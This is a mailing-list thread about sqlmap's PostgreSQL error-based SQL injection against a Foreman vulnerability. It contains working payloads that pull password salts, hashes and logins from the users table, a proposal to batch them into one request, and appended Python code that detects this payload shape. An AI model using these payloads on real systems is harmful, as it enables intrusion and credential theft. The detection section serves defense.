In lots of cases you'll have some sort of length constraint on either the GET
or the POST body. Putting all those SELECTs into a single request simply won't
work (especially in GET cases).
One more thing. In the case of (e.g.) MsSQL there is no "LIMIT m,n" mechanism.
Hence, sqlmap uses something called "pivoting" to dump table content, which
requires different queries for different column values.
Bye
On Thu, Mar 29, 2018 at 1:59 AM, Brandon Perry <bperry.volat...@gmail.com> wrote:
> I’m currently exploiting a recent vulnerability announced in Foreman
> versions 1.9+ through 1.16.1. The available techniques are boolean, time,
> and error-based.
>
> Error-based is the fastest obviously, but it seems like it could be
> faster. Currently, it performs an error-based exfil in a similar way to how
> MySQL error-based injections are done, which is a single value at a time. IIRC,
> MySQL errors get truncated so that you generally can’t exfil more than 50
> or so characters at a time, so this strategy makes sense in those cases.
>
> However, PostgreSQL errors that are bubbled up don’t (seem to) have this
> limitation and will return very lengthy error messages.
>
> Currently, sqlmap will grab a value per column per row per request. That
> looks like this.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
>
> Each of these values takes a single request/response. But they could easily
> be combined into one, with each distinct value being pulled out with a
> regular expression.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS
> CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT
> COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users
> ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS
> CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
>
> But there may be a reason sqlmap does this in the former way. Anyway, just
> my 2c.
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
Miroslav Stampar
http://about.me/stamparm
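As an added, defender-side example (not from this thread and not sqlmap's own code): a small Python check that recognizes the payload shape quoted above in decoded request parameters and distinguishes the one-value-per-request form from the batched multi-SELECT form Brandon proposes. The regexes, function names and the benign sample are my own; the two injected samples are the thread's payloads re-joined onto single lines.

```python
import re
from urllib.parse import unquote_plus

# A run of two or more concatenated CHR() calls, e.g. CHR(113)||CHR(107)||CHR(120).
# sqlmap wraps the extracted value in such markers; the digits differ per run, so a
# rule should key on the shape, never on the literal values seen in one capture.
CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))+", re.IGNORECASE)
# Outer shape of the PostgreSQL error-based probe: CAST(( ... ) AS NUMERIC)
CAST_NUMERIC = re.compile(r"CAST\s*\(.*?\bAS\s+NUMERIC\s*\)", re.IGNORECASE | re.DOTALL)
SUBSELECT = re.compile(r"\(\s*SELECT\b", re.IGNORECASE)


def decode_chr_run(run: str) -> str:
    """Turn CHR(113)||CHR(107) into the literal text it builds ('qk')."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", run, re.IGNORECASE))


def inspect_request(raw_query: str) -> dict:
    """Classify one raw query string. 'subselects' is the number of SELECT
    subqueries inside the CAST: 1 means one value per request, >1 means several
    columns batched into a single request. 'delimiters' are the decoded markers."""
    q = unquote_plus(raw_query)
    cast = CAST_NUMERIC.search(q)
    if not cast:
        return {"match": False, "subselects": 0, "delimiters": []}
    body = cast.group(0)
    runs = [decode_chr_run(m.group(0)) for m in CHR_RUN.finditer(body)]
    return {"match": bool(runs), "subselects": len(SUBSELECT.findall(body)), "delimiters": runs}


# Constructed samples. BENIGN is a normal parameter; the other two are the thread's payloads.
BENIGN = "widgets[16][col]=1"
SINGLE_COLUMN = ("widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))"
    "||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users"
    " ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113))"
    " AS NUMERIC)-- lsuo][col]=1")
BATCHED = ("widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))"
    "||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users"
    " ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))"
    "||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users"
    " ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))"
    "||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users"
    " ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113))"
    " AS NUMERIC)-- lsuo][col]=1")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("single", SINGLE_COLUMN), ("batched", BATCHED)):
        print(name, inspect_request(sample))
```

A WAF or log pipeline that alerts on the CAST/CHR() shape will see the batched variant as one request rather than three, so per-request rate thresholds alone are a weaker signal than the payload structure itself.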